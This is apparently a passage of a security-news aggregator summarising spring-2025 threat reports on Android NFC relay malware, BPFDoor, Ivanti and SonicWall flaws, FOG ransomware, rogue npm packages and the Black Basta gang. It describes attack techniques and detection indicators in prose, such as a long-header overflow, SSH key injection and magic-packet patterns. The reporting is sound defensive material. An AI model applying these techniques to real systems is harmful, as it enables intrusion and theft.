  • www.scworld.com: Interlock ransomware evolves tactics with ClickFix, infostealers
  • Talkback Resources: Interlock Ransomware Uses Evolving Tactics to Evade Detection
  • securityonline.info: Security Online discusses interlock ransomware using Evolving Tactics to Evade Detection.
  • gbhackers.com: State Sponsored Hackers now Widely Using ClickFix Attack Technique in Espionage Campaigns
  • The Hacker News: State-Sponsored Hackers Weaponize ClickFix Tactic in Targeted Malware Campaigns
  • bsky.app: Interlock ransomware gang pushes fake IT tools in ClickFix attacks ift.tt/TqmAQIF
  • securityonline.info: State-Sponsored Actors Adopt ClickFix Technique in Cyber Espionage
  • hackread.com: North Korea, Iran, Russia-Backed Hackers Deploy ClickFix in New Attacks

Bill Toulas@BleepingComputer //
A new malware-as-a-service (MaaS) platform, called 'SuperCard X', has surfaced, targeting Android devices. This malware leverages Near-Field Communication (NFC) relay attacks to facilitate unauthorized point-of-sale (POS) and Automated Teller Machine (ATM) transactions. It operates by using compromised payment card data obtained through social engineering tactics. Victims are often lured into downloading a malicious application via SMS or phone calls, which then captures payment card data when the card is in proximity to the infected device.

This sophisticated Android-based malware is part of a fraud campaign that combines social engineering, malware distribution, and NFC data interception. The data captured is relayed in real-time through a Command and Control (C2) infrastructure to an attacker-controlled device, enabling immediate fraudulent cash withdrawals and purchases. The malware’s architecture includes two applications: “Reader” for capturing NFC card data and “Tapper” for receiving this data and performing the fraud. Communication between these apps uses HTTP over a C2 infrastructure, which employs mutual TLS (mTLS) to secure and authenticate connections.

SuperCard X exhibits a low detection rate among antivirus solutions due to its narrow focus on NFC data capture and minimal permission requirements. Cleafy Threat Intelligence researchers identified code similarities between SuperCard X and the open-source NFCGate tool, as well as another Android malware called NGate. This type of attack represents a significant escalation in fraud capabilities, extending beyond the usual targets of banking institutions to directly impact payment providers and card issuers.

Recommended read:
References :
  • gbhackers.com: New Android SuperCard X Malware Uses NFC-Relay Technique for POS & ATM Transactions
  • BleepingComputer: A new malware-as-a-service (MaaS) platform named 'SuperCard X' has emerged, targeting Android devices via NFC relay attacks that enable point-of-sale and ATM transactions using compromised payment card data.
  • The DefendOps Diaries: Explore SuperCard X, a sophisticated mobile malware using NFC relay attacks and minimal permissions to evade detection.
  • Cyber Security News: New Android SuperCard X Malware Employs NFC-Relay Technique for Fraudulent POS & ATM Withdrawals
  • gbhackers.com: New Android SuperCard X Malware Uses NFC-Relay Technique for POS & ATM Transactions
  • BleepingComputer: New Android malware steals your credit cards for NFC relay attacks
  • cybersecuritynews.com: CyberscurityNews reports New Android SuperCard X Malware Employs NFC-Relay Technique for Fraudulent POS & ATM Withdrawals
  • www.cleafy.com: Cleafy Labs reports SuperCard X: exposing a Chinese-speaker MaaS for NFC Relay fraud operation
  • Secure Bulletin: SuperCard X: exposing a MaaS for NFC Relay fraud operation
  • securebulletin.com: SuperCard X: exposing a MaaS for NFC Relay fraud operation
  • www.bleepingcomputer.com: New Android malware steals your credit cards for NFC relay attacks
  • BleepingComputer: A new malware-as-a-service (MaaS) platform named 'SuperCard X' has emerged, targeting Android devices via NFC relay attacks that enable point-of-sale and ATM transactions using compromised payment card data.
  • bsky.app: Talkback Threat Summary for Android SuperCard X Malware Uses NFC-Relay Technique for POS & ATM Transactions
  • securityaffairs.com: New sophisticate malware SuperCard X targets Androids via NFC relay attacks
  • The Hacker News: SuperCard X Android Malware Enables Contactless ATM and PoS Fraud via NFC Relay Attacks
  • www.scworld.com: Novel SuperCard X MaaS platform leveraged for payment card compromise

Pierluigi Paganini@Security Affairs //
The North Korean hacking group Kimsuky has been identified as the perpetrator of a new cyber espionage campaign, dubbed "Larva-24005," that exploits a patched Microsoft Remote Desktop Services flaw, commonly known as BlueKeep (CVE-2019-0708), to gain initial access to systems. According to a report from the AhnLab Security intelligence Center (ASEC), Kimsuky targeted organizations in South Korea and Japan, primarily in the software, energy, and financial sectors, beginning in October 2023. The campaign also extended to other countries, including the United States, China, Germany, and Singapore, indicating a broader global reach.

The attackers used a combination of techniques to infiltrate systems. While RDP vulnerability scanners were found on compromised systems, the report indicates that the actual breaches were not always initiated through the use of these scanners. Instead, Kimsuky leveraged phishing emails containing malicious attachments that exploited the Microsoft Office Equation Editor vulnerability (CVE-2017-11882) to distribute malware. Once inside, the attackers installed a dropper to deploy various malware suites, including MySpy, designed to collect system information, and RDPWrap, a tool that facilitates persistent remote access by modifying system settings.

To further their surveillance capabilities, Kimsuky deployed keyloggers such as KimaLogger and RandomQuery to capture user keystrokes. The group predominantly used ".kr" domains for their Command and Control (C2) operations, employing sophisticated setups to manage traffic routing and potentially evade detection. ASEC's analysis of the attackers' infrastructure revealed a global footprint, with victims identified in countries across Asia, Europe, and North America. The use of both RDP exploits and phishing suggests a versatile approach to compromising target systems, highlighting the importance of both patching vulnerabilities and educating users about phishing tactics.

Recommended read:
References :
  • securityaffairs.com: Kimsuky APT exploited BlueKeep RDP flaw in attacks against South Korea and Japan
  • The Hacker News: Kimsuky Exploits BlueKeep RDP Vulnerability to Breach Systems in South Korea and Japan
  • gbhackers.com: The AhnLab SEcurity intelligence Center (ASEC) has released a detailed analysis of a sophisticated cyber campaign dubbed “Larva-24005,†linked to the notorious North Korean hacking group Kimsuky.
  • securityonline.info: A new cybersecurity report from the AhnLab Security intelligence Center (ASEC) has shed light on a recently identified
  • Daily CyberSecurity: A new cybersecurity report from the AhnLab Security intelligence Center (ASEC) has shed light on a recently identified
  • ciso2ciso.com: Kimsuky APT exploited BlueKeep RDP flaw in attacks against South Korea and Japan – Source: securityaffairs.com
  • ciso2ciso.com: Kimsuky APT exploited BlueKeep RDP flaw in attacks against South Korea and Japan
  • www.csoonline.com: North Korea-backed Kimsuky targets unpatched BlueKeep systems in new campaign
  • www.scworld.com: Attacks with BlueKeep, Microsoft Office exploits launched by Kimsuky-linked group

Anna Ribeiro@Industrial Cyber //
Trend Micro researchers have uncovered a novel controller linked to the BPFDoor backdoor, enabling stealthy reverse shell attacks on Linux servers across Asia and the Middle East. This previously unseen controller is attributed to the Red Menshen advanced persistent threat (APT) group, tracked by Trend Micro as Earth Bluecrow. The attacks, observed in the telecommunications, finance, and retail sectors, have been documented in South Korea, Hong Kong, Myanmar, Malaysia, and Egypt. This discovery highlights the ongoing cyberespionage activities leveraging sophisticated and evasive techniques to compromise Linux systems.

The controller's primary function is to open a reverse shell on compromised systems, which allows attackers to move laterally within the network, control additional systems, and access sensitive data. BPFDoor uses the packet filtering features of Berkeley Packet Filtering (BPF) to inspect network packets, using "magic sequences" to activate the backdoor. This method allows BPFDoor to evade traditional security measures, making it a perfect tool for long-term espionage, as casual security sweeps won’t detect anything unusual. The malware can also change process names and does not listen to any port, further masking its presence.

Trend Micro's investigation indicates that BPFDoor has been active since at least 2021, with consistent campaigns targeting Linux servers across multiple industries. The attackers are known to hide malware in non-standard paths, such as /tmp/zabbix_agent.log or /bin/vmtoolsdsrv. Defenders are advised to monitor for TCP packets starting with 0x5293, followed by IP:port and password and UDP/ICMP packets. While static indicators are unreliable due to customizable magic packets and varying passwords, proactive network monitoring and analysis of BPF code are crucial for protecting organizations against BPF-powered threats.

Recommended read:
References :
  • securityonline.info: BPFDoor Backdoor Used in Asia, Middle East Cyberespionage
  • Virus Bulletin: Trend Micro's Fernando Mercês writes about BPFDoor, a state-sponsored backdoor designed for cyberespionage activities targeting the telecommunications, finance and retail sectors across South Korea, Hong Kong, Myanmar, Malaysia and Egypt.
  • www.trendmicro.com: BPFDoor’s new hidden controller emerges! Attackers can open reverse shells or direct port for stealth access on Linux servers.
  • gbhackers.com: A new wave of cyber espionage attacks has brought BPFDoor malware into the spotlight as a stealthy and dangerous tool for compromising networks.
  • Cyber Security News: CybersecurityNews: Stealthy Rootkit-Like Malware Known as BPFDoor Using Reverse Shell to Dig Deeper into Compromised Networks
  • gbhackers.com: GBHackers: BPFDoor Malware Uses Reverse Shell to Expand Control Over Compromised Networks
  • Industrial Cyber: Trend Micro details BPFDoor controller used in stealthy reverse shell attacks on telecom, finance, and retail
  • www.scworld.com: Novel BPFDoor backdoor component facilitates covert attacks
  • Security Risk Advisors: 🚩 BPFDoor’s Hidden Controller Enables Stealthy Lateral Movement in Linux Server Attacks
  • industrialcyber.co: Trend Micro details BPFDoor controller used in stealthy reverse shell attacks on telecom, finance, and retail
  • sra.io: BPFDoor’s Hidden Controller Enables Stealthy Lateral Movement in Linux Server Attacks
  • The Hacker News: New BPFDoor Controller Enables Stealthy Lateral Movement in Linux Server Attacks
  • The Hacker News: New BPFDoor Controller Enables Stealthy Lateral Movement in Linux Server Attacks

Jenna McLaughlin@NPR Topics: Technology //
A whistleblower at the US National Labor Relations Board (NLRB) has come forward with allegations of a significant cybersecurity breach involving the Department of Government Efficiency (DOGE), overseen by Elon Musk. According to the whistleblower, Daniel Berulis, DOGE operatives arrived at the agency in early March and were granted unrestricted access to internal systems, a move that deviated from standard operating procedures. The whistleblower claims that these DOGE employees ignored infosec rules and were instructed to hand over any requested accounts and stay out of DOGE’s way.

According to the affidavit submitted to the Senate Intelligence Committee, these actions led to a "significant cybersecurity breach" potentially exposing the agency's data to foreign adversaries. The whistleblower also alleges that during their activity, DOGE employees exfiltrated 10GB of data to servers in the US and disabled monitoring tools, raising concerns about potential data exposure. Berulis’s document points out that not even his CIO enjoyed the level of access given to DOGE unit operatives, and that the NLRB already had auditor accounts set up that provided enough privileges to check data without being able to edit, copy, or remove it.

The most alarming aspect of the allegations involves attempted access to the NLRB's systems from a Russian IP address using legitimate accounts created by DOGE staffers. These attempts were reportedly blocked, but the valid credentials used suggest a potential compromise. The NPR has reported that the data that DOGE moved could have included sensitive information on unions, ongoing legal cases and corporate secrets. Democratic lawmakers are calling for an investigation into the matter.

Recommended read:
References :
  • ciso2ciso.com: Whistleblower alleges Russian IP address attempted access to US agency’s systems via DOGE-created accounts – Source: www.csoonline.com
  • The Register - Security: Whistleblower describes DOGE IT dept rampage at America's labor watchdog
  • www.csoonline.com: Whistleblower alleges Russian IP address attempted access to US agency’s systems via DOGE-created accounts.
  • DataBreaches.Net: A whistleblower’s disclosure details how DOGE may have taken sensitive labor data
  • aboutdfir.com: A whistleblower’s disclosure details details how DOGE may have taken sensitive labor data In the first days of March, a team of advisers from President Trump’s new Department of Government Efficiency initiative arrived at the Southeast Washington, D.C., headquarters of the National Labor Relations Board.
  • Policy ? Ars Technica: Government IT whistleblower calls out DOGE, says he was threatened at home
  • NPR Topics: Technology: Someone using a Russian IP address attempted to access the internal systems of the US National Labor Relations Board (NLRB) using legitimate accounts set up by staff from Elon Musk's Department of Government Efficiency (DOGE), a whistleblower inside the agency has alleged.

Stu Sjouwerman@blog.knowbe4.com //
A China-based cybercriminal gang known as the "Smishing Triad" is reportedly launching a wave of SMS phishing attacks, or "smishing," targeting users in both the US and the UK. These attacks are themed around road tolls, with victims receiving text messages that appear to be from toll road operators. The messages warn recipients of unpaid toll fees and potential fines if the fees are not promptly addressed. Cybersecurity researchers have issued warnings about this widespread and ongoing SMS phishing campaign, noting that it has been actively targeting toll road users since mid-October 2024, aiming to steal their financial information.

Researchers have linked the surge in these SMS scams to new features added to a popular commercial phishing kit sold in China. This kit simplifies the process of creating convincing lures that spoof toll road operators across multiple US states. The phishing pages are designed to closely mimic the websites of these operators as they appear on mobile devices, and in some cases, will not even load unless accessed from a mobile device. The goal of these kits is to obtain enough information from victims to add their payment cards to mobile wallets. These cards can then be used for fraudulent purchases in physical stores, online, or to launder money through shell companies.

The phishing campaigns often impersonate U.S. electronic toll collection systems like E-ZPass, sending SMS messages and Apple iMessages to individuals across several states including Washington, Florida, Pennsylvania, Virginia, Texas, Ohio, Illinois, and Kansas. The texts prompt recipients to click on a fake link, often requiring them to reply with "Y" to activate the link, a tactic used in other phishing kits. Victims who click the link are directed to a fraudulent E-ZPass page where they are asked to enter personal and financial information, which is then stolen by the attackers.

Recommended read:
References :
  • blog.knowbe4.com: Toll-themed smishing attacks surge in US and UK
  • The Hacker News: Cybersecurity researchers are warning of a widespread and ongoing SMS phishing campaign that's been targeting toll road users in the United States for financial theft since mid-October 2024.
  • ciso2ciso.com: Cybersecurity researchers are warning of a "widespread and ongoing" SMS phishing campaign that's been targeting toll road users in the United States for financial theft since mid-October 2024.
  • krebsonsecurity.com: Residents across the United States are being inundated with text messages purporting to come from toll road operators like E-ZPass, warning that recipients face fines if a delinquent toll fee remains unpaid.
  • The DefendOps Diaries: Chinese Smishing Kit Powers Widespread Toll Fraud Campaign Targeting U.S. Users in 8 States
  • ciso2ciso.com: Chinese Smishing Kit Powers Widespread Toll Fraud Campaign Targeting U.S. Users in 8 States – Source:thehackernews.com
  • www.scworld.com: Massive ongoing US toll fraud underpinned by Chinese smishing kit

@github.com //
A critical Remote Code Execution (RCE) vulnerability, identified as CVE-2025-32434, has been discovered in PyTorch, a widely used open-source machine learning framework. This flaw, detected by security researcher Ji’an Zhou, undermines the safety of the `torch.load()` function, even when configured with `weights_only=True`. This parameter was previously trusted to prevent unsafe deserialization, making the vulnerability particularly concerning for developers who relied on it as a security measure. The discovery challenges long-standing security assumptions within machine learning workflows.

This vulnerability affects PyTorch versions 2.5.1 and earlier and has been assigned a CVSS v4 score of 9.3, indicating a critical security risk. Attackers can exploit the flaw by crafting malicious model files that bypass deserialization restrictions, allowing them to execute arbitrary code on the target system during model loading. The impact is particularly severe in cloud-based AI environments, where compromised models could lead to lateral movement, data breaches, or data exfiltration. As Ji'an Zhou noted, the vulnerability is paradoxical because developers often use `weights_only=True` to mitigate security issues, unaware that it can still lead to RCE.

To address this critical issue, the PyTorch team has released version 2.6.0. Users are strongly advised to immediately update their PyTorch installations. For systems that cannot be updated immediately, the only viable workaround is to avoid using `torch.load()` with `weights_only=True` entirely. Alternative model-loading methods, such as using explicit tensor extraction tools, are recommended until the patch is applied. With proof-of-concept exploits likely to emerge soon, delayed updates risk widespread system compromises.

Recommended read:
References :

Nathaniel Morales@feeds.trendmicro.com //
Cybercriminals are actively deploying FOG ransomware disguised as communications from the U.S. Department of Government Efficiency (DOGE) via malicious emails. This campaign, which has been ongoing since January, involves cybercriminals spreading FOG ransomware by claiming ties to DOGE in their phishing attempts. The attackers are impersonating the U.S. DOGE to infect targets across multiple sectors, including technology and healthcare. It has been revealed that over 100 victims have been impacted by this -DOGE-themed ransomware campaign since January.

Cybercriminals are distributing a ZIP file named "Pay Adjustment.zip" through phishing emails. Inside this archive is an LNK file disguised as a PDF document. Upon execution, this LNK file triggers a PowerShell script named "stage1.ps1", which downloads additional ransomware components. The script also opens politically themed YouTube videos, potentially to distract the victim. The initial ransomware note makes references to DOGE to add confusion. The attackers utilize a tool called 'Ktool.exe' to escalate privileges by exploiting a vulnerability in the Intel Network Adapter Diagnostic Driver.

The ransomware note, RANSOMNOTE.txt, references DOGE and includes names of individuals associated with the department. Victims are being asked to pay $1,000 in Monero, although it is unclear whether paying the ransom leads to data recovery or if it is an elaborate troll. Trend Micro revealed that the latest samples of Fog ransomware, uploaded to VirusTotal between March 27 and April 2, 2025, spread through distribution of a ZIP file containing a LNK file disguised as a PDF.

Recommended read:
References :
  • cyberinsider.com: FOG Ransomware Impersonates U.S. DOGE to Infect Targets
  • gbhackers.com: Cybercriminals Deploy FOG Ransomware Disguised as DOGE via Malicious Emails
  • www.trendmicro.com: FOG Ransomware Spread by Cybercriminals Claiming Ties to DOGE
  • www.scworld.com: Fog ransomware notes troll with DOGE references, bait insider attacks
  • gbhackers.com: Cybercriminals Deploy FOG Ransomware Disguised as DOGE via Malicious Emails
  • securityonline.info: FOG Ransomware Campaign Targets Multiple Sectors with Phishing and Payload Obfuscation
  • darkwebinformer.com: FOG Ransomware Attack Update for the 21st of April 2025

@unit42.paloaltonetworks.com //
A new multi-stage malware attack has been identified, deploying a range of malware families including Agent Tesla, Remcos RAT, and XLoader. This intricate attack chain employs multiple execution paths, designed to evade detection, bypass traditional sandboxes, and ensure the successful delivery and execution of malicious payloads. Attackers are increasingly relying on these complex delivery mechanisms to compromise systems.

This campaign, observed in December 2024, begins with phishing emails disguised as order release requests, enticing recipients to open malicious archive attachments. These attachments contain JavaScript encoded (.JSE) files, which initiate the infection chain by downloading and executing a PowerShell script from an external server. The PowerShell script then decodes and executes a Base64-encoded payload.

The attack then diverges into two possible execution paths. One involves a .NET executable that decrypts an embedded payload, like Agent Tesla or XLoader, and injects it into a running "RegAsm.exe" process. The other path uses an AutoIt compiled executable containing an encrypted payload that loads shellcode, ultimately injecting a .NET file into a "RegSvcs.exe" process, ultimately leading to Agent Tesla deployment. This dual-path approach highlights the attacker's focus on resilience and evasion, using simple, stacked stages to complicate analysis and detection.

Recommended read:
References :
  • Virus Bulletin: Palo Alto's Saqib Khanzada looks into a multi-layered campaign that delivers malware like Agent Tesla variants, Remcos RAT or XLoader. This multi-layered attack chain leverages multiple execution paths to evade detection and complicate analysis.
  • The Hacker News: Multi-Stage Malware Attack Uses .JSE and PowerShell to Deploy Agent Tesla and XLoader
  • Anonymous ???????? :af:: Palo Alto's Saqib Khanzada looks into a multi-layered campaign that delivers malware like Agent Tesla variants, Remcos RAT or XLoader.

@Talkback Resources //
Cybersecurity researchers have recently discovered a series of malicious packages lurking within the npm registry, a popular repository for JavaScript packages. These packages are designed to mimic the legitimate "node-telegram-bot-api," a widely-used library for creating Telegram bots. However, instead of providing bot functionalities, these rogue packages install SSH backdoors on Linux systems, granting attackers persistent, passwordless remote access. The identified malicious packages include "node-telegram-utils," "node-telegram-bots-api," and "node-telegram-util," which have accumulated around 300 downloads collectively.

The packages employ a technique known as "typosquatting," where they use names similar to the legitimate library to deceive developers into installing them. They also utilize "starjacking" by linking to the genuine library's GitHub repository, further enhancing their appearance of authenticity. Once installed on a Linux system, these malicious packages inject SSH keys into the "~/.ssh/authorized_keys" file, enabling attackers to remotely access the compromised machine. They also collect system information, including the username and external IP address, and transmit it to a remote server controlled by the attackers.

Security experts warn that simply removing the malicious packages is insufficient to eliminate the threat. The injected SSH keys provide a persistent backdoor, allowing attackers to execute code and exfiltrate data even after the packages are uninstalled. This incident highlights the growing threat of supply chain attacks targeting development ecosystems like npm, underscoring the importance of rigorous dependency auditing and vigilant monitoring to safeguard systems from malicious code and unauthorized access. The researchers at Socket recommend immediate defensive actions to combat these types of threats.

Recommended read:
References :
  • ciso2ciso.com: Rogue npm Packages Mimic Telegram Bot API to Plant SSH Backdoors on Linux Systems
  • Talkback Resources: Rogue npm Packages Mimic Telegram Bot API to Plant SSH Backdoors on Linux Systems
  • The Hacker News: Rogue npm Packages Mimic Telegram Bot API to Plant SSH Backdoors on Linux Systems
  • Talkback Resources: Talkback.sh discusses Rogue npm Packages Mimic Telegram Bot API to Plant SSH Backdoors on Linux Systems [app] [net] [mal]
  • ciso2ciso.com: Rogue npm Packages Mimic Telegram Bot API to Plant SSH Backdoors on Linux Systems – Source:thehackernews.com
  • linuxsecurity.com: We Linux security administrators face a growing challenge with sophisticated supply chain attacks targeting popular development ecosystems, such as npm.
  • securityonline.info: Malicious npm Packages Backdoor Telegram Bot Developers

sila.ozeren@picussecurity.com (Sıla@Resources-2 //
A Chinese cyber-espionage group, identified as UNC5221, is actively exploiting a zero-day vulnerability, CVE-2025-22457, in Ivanti Connect Secure. UNC5221 is suspected to be a China-nexus cyber-espionage group known for aggressively targeting edge network devices, such as VPNs, firewalls, and routers, with zero-day exploits since at least 2023. This vulnerability allows for unauthenticated remote code execution, giving attackers the ability to gain unauthorized access to organizations’ networks. The group has a history of quickly leveraging new flaws in Ivanti's Pulse Connect Secure/Ivanti Connect Secure (ICS) VPN appliances.

The latest campaign, launched in mid-March 2025, involves deploying the BRICKSTORM backdoor in targeted cyberespionage campaigns across Europe, including U.S.-based targets. This backdoor has evolved, with the Windows version now leveraging network tunneling capabilities and valid credentials to compromise Remote Desktop Protocol and Server Message Block, unlike the original Linux-targeting payload. The campaign is part of a broader trend of Chinese state-sponsored attackers focusing on internet-facing infrastructure for espionage, impacting government and enterprise networks globally.

Ivanti released a patch for CVE-2025-22457 on April 3, 2025, which affects Ivanti Connect Secure, Pulse Connect Secure, Ivanti Policy Secure, and ZTA Gateways. The vulnerability is a stack-based buffer overflow that can be exploited by sending a crafted HTTP request with an overly long X-Forwarded-For header. CISA has added the CVE to its Known Exploited Vulnerabilities (KEV) catalog and recommends immediate action. Organizations using vulnerable Ivanti devices are strongly advised to apply the patch immediately and continuously monitor their external attack surface.

Recommended read:
References :
  • watchTowr Labs: Watchtowr description
  • Resources-2: Who Is the China-Nexus Group UNC5221? UNC5221 is a suspected China-nexus cyber-espionage group known for aggressively targeting edge network devices (VPNs, firewalls, routers) with zero-day exploits since at least 2023 .
  • www.scworld.com: Organizations across Europe are having their Windows systems compromised with the BRICKSTORM backdoor linked to Chinese state-backed threat operation UNC5221 as part of a cyberespionage campaign that commenced three years ago, Infosecurity Magazine reports.
  • blog.criminalip.io: Response Strategy for Ivanti VPN Vulnerability CVE-2025-22457: CTI-Based Attack Surface Detection

Krista Lyons@OpenVPN Blog //
References: Blog , OpenVPN Blog
Multiple security vulnerabilities are currently being exploited in Fortinet and SonicWall products, posing a significant risk to organizations using these devices. The Cybersecurity and Infrastructure Security Agency (CISA) has taken notice, adding the SonicWall SMA100 Appliance flaw (CVE-2021-20035) to its Known Exploited Vulnerabilities catalog, urging federal agencies to apply mitigations by May 7, 2025. This vulnerability, which impacts SonicWall SMA 200, SMA 210, SMA 400, SMA 410, and SMA 500v devices, allows remote authenticated attackers to inject arbitrary operating system commands.

Attackers have been actively exploiting the SonicWall SMA100 vulnerability (CVE-2021-20035) since January 2025. SonicWall has updated its security advisory to reflect the current active exploitation of the flaw which can lead to code execution, as opposed to a denial-of-service. While the vulnerability affects SMA100 devices running older firmware, customers are urged to upgrade to the latest firmware. In addition to the SonicWall vulnerability, threat actors are employing new techniques to exploit a 2023 FortiOS flaw (CVE-2023-27997). This involves manipulating symbolic links during the device’s boot process, allowing attackers with prior access to maintain control even after firmware updates.

Fortinet has released security updates for FortiOS and FortiGate. Organizations using Fortinet products should apply the latest patches. Similarly, SonicWall users are advised to upgrade to the fixed versions of firmware, specifically 10.2.1.1-19sv and higher, 10.2.0.8-37sv and higher, or 9.0.0.11-31sv and higher. With both SonicWall and CISA confirming the CVE-2021-20035 exploit, details about the attacks remain scarce.

Recommended read:
References :
  • Blog: Threat actors using new technique to exploit 2023 FortiOS flaw
  • OpenVPN Blog: SonicWall VPN Exploited, 16,000 Fortinet Devices Compromised | OpenVPN

@detect.fyi //
References: detect.fyi , medium.com , wazuh.com ...
The Black Basta ransomware group has demonstrated remarkable resilience and adaptability despite a significant leak of their internal communications, which occurred in the first quarter of 2025. Analysis of the leaked chat logs confirms that key actors within the group, operating under aliases like @usernamegg, @lapa, and @usernameugway, continue to coordinate attacks using shared infrastructure and custom tools. This indicates a high level of operational security and a focus on long-term planning, as the group rotates delivery domains, stages different botnets for specific functions, and carefully avoids detection through staggered attack timing and limited-volume delivery. The group's persistence highlights the challenges faced by defenders in disrupting sophisticated cybercrime enterprises.

Their tactics, techniques, and procedures (TTPs) align closely with those attributed by Microsoft to groups like Storm-1674, Storm-1811, and Storm-2410. These include exploiting vulnerabilities in Citrix and VPN portals, targeting weak authentication on ESXi hypervisors, employing credential stuffing attacks, and leveraging remote access utilities and scripts for payload delivery. Black Basta has also shown an increasing emphasis on social engineering, such as impersonating IT support staff via phone calls, mirroring techniques associated with Storm-2410. This adaptability and willingness to evolve their attack methods underscore the group's sophistication.

Black Basta's operations involve a multi-stage attack chain, starting with initial access gained through various methods, including exploiting vulnerabilities in unpatched systems, phishing campaigns, and social engineering tactics such as impersonating IT help desks via Microsoft Teams. The group also employs lightweight downloaders, memory-based loaders, and obfuscated commands via tools like PowerShell and rundll32.exe, indicating a shift toward stealthier and more precise attack delivery. Detection methods for Black Basta include configuring Endpoint Detection and Response (EDR) tools to look for unusual file behavior, command-line activity, registry changes, and network traffic.

Recommended read:
References :
  • detect.fyi: Analysis of Black Basta's ransomware resilience and evolution after a data leak.
  • medium.com: Information on Black Basta's use of lightweight downloaders, memory-based loaders, and obfuscated commands.
  • valhalla.nextron-systems.com: Report on Black Basta's ransomware operations.
  • wazuh.com: Analysis of the leaked Black Basta chat logs revealing their operational methods.